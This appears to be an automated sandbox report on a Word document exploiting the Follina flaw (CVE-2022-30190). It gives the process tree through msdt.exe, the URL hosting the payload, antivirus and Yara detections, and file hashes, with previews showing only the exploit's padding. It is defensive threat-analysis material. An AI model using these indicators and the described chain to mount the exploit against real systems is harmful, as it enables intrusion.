          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
          Behavior Graph ID: 685945; Sample: icRTA4gcSe.docx; Start date: 18/08/2022; Architecture: WINDOWS; Score: 92
          Graph signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 5 other signatures
          Process tree:
            WINWORD.EXE
              network: 52.95.143.42, 443, 49749, 49750 (AMAZONEXPANSIONGB, United States); s3-r-w.eu-west-2.amazonaws.com 52.95.148.198, 443, 49746, 49747 (AMAZON-02US, United States); sqdocs.s3.eu-west-2.amazonaws.com
              dropped: C:\Users\user\AppData\...\icRTA4gcSe.docx.LNK (MS); fb0f9c45-fb5f-4690...e11a762d4739[1].htm (HTML); C:\Users\user\AppData\Local\...\3A694E5B.htm (HTML); C:\Users\user\AppData\Local\...\3903F105.htm (HTML)
              started: msdt.exe, which dropped C:\Windows\Temp\...\DiagPackage.dll.mui (PE32) and C:\Windows\Temp\...\DiagPackage.dll (PE32+); MSOSYNC.EXE
            csc.exe: dropped C:\Users\user\AppData\Local\...\v2wr4cux.dll (PE32); started cvtres.exe
            csc.exe: dropped C:\Users\user\AppData\Local\...\5pliokiz.dll (PE32); started cvtres.exe
            3 other processes: dropped C:\Users\user\AppData\Local\...\h34ip5a5.dll (PE32); started cvtres.exe

          Source | Detection | Scanner | Label
          icRTA4gcSe.docx | 48% | Virustotal |
          icRTA4gcSe.docx | 29% | Metadefender |
          icRTA4gcSe.docx | 62% | ReversingLabs | Document-Office.Exploit.CVE-2022-30190
          icRTA4gcSe.docx | 100% | Avira | W97M/Dldr.Agent.G1
          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm | 100% | Avira | JS/CVE-2022-30190.G
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm | 100% | Avira | JS/CVE-2022-30190.G
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm | 100% | Avira | JS/CVE-2022-30190.G
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dll | 0% | Metadefender |
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dll | 0% | ReversingLabs |
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.mui | 0% | Metadefender |
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.mui | 0% | ReversingLabs |
          No Antivirus matches
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          s3-r-w.eu-west-2.amazonaws.com | 52.95.148.198 | true | false | | high
          sqdocs.s3.eu-west-2.amazonaws.com | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html | false | | high
                                                      high
                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      https://portal.office.com/account/?ref=ClientMeControl112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                        high
                                                        https://graph.ppe.windows.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                          high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://powerlift-frontdesk.acompli.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://tasks.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                            high
                                                            https://officeci.azurewebsites.net/api/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              high
                                                              https://my.microsoftpersonalcontent.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://store.office.cn/addinstemplate112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.aadrm.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                high
                                                                https://globaldisco.crm.dynamics.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                  high
                                                                  https://messaging.engagement.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                    high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                      high
                                                                      https://dev0-api.acompli.net/autodetect112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.odwebp.svc.ms112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://api.diagnosticssdf.office.com/v2/feedback112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                        high
                                                                        https://api.powerbi.com/v1.0/myorg/groups112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                          high
                                                                          https://web.microsoftstream.com/video/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                            high
                                                                            https://api.addins.store.officeppe.com/addinstemplate112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://graph.windows.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                              high
                                                                              https://dataservice.o365filtering.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officesetup.getmicrosoftkey.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://analysis.windows.net/powerbi/api112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                high
                                                                                https://prod-global-autodetect.acompli.net/autodetect112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://outlook.office365.com/autodiscover/autodiscover.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                  high
                                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                    high
                                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                      high
                                                                                      https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                        high
                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                          high
                                                                                          https://ncus.contentsync.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                            high
                                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                              high
                                                                                              http://weather.service.msn.com/data.aspx112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                high
                                                                                                https://apis.live.net/v5.0/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                  high
                                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                    high
                                                                                                    https://messaging.lifecycle.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                      high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                        high
                                                                                                        https://management.azure.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                            high
                                                                                                            https://wus2.contentsync.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://incidents.diagnostics.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                              high
                                                                                                              https://clients.config.office.net/user/v1.0/ios112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                high
                                                                                                                https://insertmedia.bing.office.net/odc/insertmedia112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                  high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/api/v1.0/me/Activities112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                      high
                                                                                                                      https://api.office.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                        high
                                                                                                                        https://incidents.diagnosticssdf.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                          high
                                                                                                                          https://asgsmsproxyapi.azurewebsites.net/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policies112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                            high
                                                                                                                            https://entitlement.diagnostics.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                              high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                high
                                                                                                                                https://substrate.office.com/search/api/v2/init112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocation112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://outlook.office365.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://webshell.suite.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://substrate.office.com/search/api/v1/SearchHistory112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://management.azure.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://messaging.lifecycle.office.com/getcustommessage16112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://clients.config.office.net/c2r/v1.0/InteractiveInstallation112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://login.windows.net/common/oauth2/authorize112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://graph.windows.net/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://api.powerbi.com/beta/myorg/imports112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://devnull.onenote.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://messaging.action.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://ncus.pagecontentsync.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://messaging.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
52.95.148.198 | s3-r-w.eu-west-2.amazonaws.com | United States | 16509 | AMAZON-02US | false
52.95.143.42 | unknown | United States | 8987 | AMAZONEXPANSIONGB | false
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 685945
Start date and time: 2022-08-18 02:00:48 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: icRTA4gcSe.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 36
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.expl.evad.winDOCX@16/30@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .docx
                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                                  • Scroll down
                                                                                                                                                                  • Close Viewer
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe
                                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.191, 52.109.12.21, 20.223.24.244
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                   • Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  No simulations
                                                                                                                                                                  No context
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:Microsoft Access Database
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):528384
                                                                                                                                                                  Entropy (8bit):0.476061474690538
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:OGfX6GJCg+8SFofZ0jGB3R3FxMWJwtZ1Im+hVZO4Fg:9fXdChH4ZVPxJ/lI
                                                                                                                                                                  MD5:AB02519679BCFE27E2AC836CE9798823
                                                                                                                                                                  SHA1:9D0A3CF2D5BE3B6BED8A0791A1C7DCBD8D9A6E2D
                                                                                                                                                                  SHA-256:AD60DD69EB329CD878498AF9F4363952F4A63E898AD4441F61DF05CAEF6F1406
                                                                                                                                                                  SHA-512:2B0D89BCDF57660E21A35C6041C7E0DE447321438330162692BD65D47C76B36B6F2F87317B8C058032144040D802DDEFEF78A2FD49F13949F1494C7238A41F97
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NqU.7...1.(....`.:{6....Z.C8..3..y[e.|*..|......`v!...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36
                                                                                                                                                                  Entropy (8bit):2.730660070105504
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                  MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                  SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                  SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                  SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                  Entropy (8bit):1.4172860556164644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:XXj1HaV:Hj1Hu
                                                                                                                                                                  MD5:A685D690B3E6C2EC585CB78A819D5CF8
                                                                                                                                                                  SHA1:A672FD809D076F8D32161E37AAF40987AE4D3A45
                                                                                                                                                                  SHA-256:7FBF8C133D03FE1C62EB9ACEAEFBEF55227ED55408C9D82033D45F10455924BC
                                                                                                                                                                  SHA-512:D5171BBF378DD09510EA70EF55EB358266FF6DD79869CB690CA653D9A5761F2BEC866DD6946642671C4443BD8204A1C195788C666F508628693B8BFDD17A3644
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:358075. Admin.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):148061
                                                                                                                                                                  Entropy (8bit):5.358148172589153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:ocQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:L1Q9DQe+zuXYr
                                                                                                                                                                  MD5:7A1020C8A1C0739640B40A7EFEAA5A34
                                                                                                                                                                  SHA1:4102FB207889BE17F2B669F2393519E1EC301EE4
                                                                                                                                                                  SHA-256:86EF343EADB0C49C5EAA00F077DEDA4597EC864FF8C357F6C67DC917348C0915
                                                                                                                                                                  SHA-512:F934CC26D8B0AF9B9C51C97B8461FBE9C84A0B786713A626D9B4DACF4F9B55D955F1A9E2ED919FFEAAF94030DF188B3036EFE314512EFE27DD296FFD7EC62590
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-18T00:01:48">.. Build: 16.0.15614.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6837
                                                                                                                                                                  Entropy (8bit):0.861791117899086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
                                                                                                                                                                  MD5:BFBFA8FDDA62476690C9077946372EAA
                                                                                                                                                                  SHA1:BBD80340C07F716600B54242F11F25E1BDC442F2
                                                                                                                                                                  SHA-256:A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
                                                                                                                                                                  SHA-512:7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6837
                                                                                                                                                                  Entropy (8bit):0.861791117899086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
                                                                                                                                                                  MD5:BFBFA8FDDA62476690C9077946372EAA
                                                                                                                                                                  SHA1:BBD80340C07F716600B54242F11F25E1BDC442F2
                                                                                                                                                                  SHA-256:A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
                                                                                                                                                                  SHA-512:7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
